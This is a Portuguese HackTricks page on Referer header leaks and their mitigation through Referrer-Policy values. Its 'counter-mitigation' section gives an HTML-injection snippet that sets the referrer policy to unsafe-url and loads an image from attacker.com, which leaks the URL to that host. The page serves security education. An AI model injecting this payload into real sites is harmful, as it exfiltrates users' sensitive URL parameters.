hacktricks/todo/interesting-http.md
2024-04-06 19:38:49 +00:00

3.6 KiB

Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks:

Cabeçalhos de referência e política

Referer é o cabeçalho usado pelos navegadores para indicar qual foi a página anterior visitada.

Informações sensíveis vazadas

Se em algum momento dentro de uma página web qualquer informação sensível estiver localizada nos parâmetros de uma requisição GET, se a página contém links para fontes externas ou um atacante for capaz de fazer/sugerir (engenharia social) que o usuário visite uma URL controlada pelo atacante. Ele poderia ser capaz de exfiltrar as informações sensíveis dentro da última requisição GET.

Mitigação

Você pode fazer o navegador seguir uma política de referência que poderia evitar que as informações sensíveis sejam enviadas para outras aplicações web:

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Contra-Mitigação

Você pode anular essa regra usando uma meta tag HTML (o atacante precisa explorar uma injeção HTML):

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

Defesa

Nunca coloque dados sensíveis dentro de parâmetros GET ou caminhos na URL.

Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks: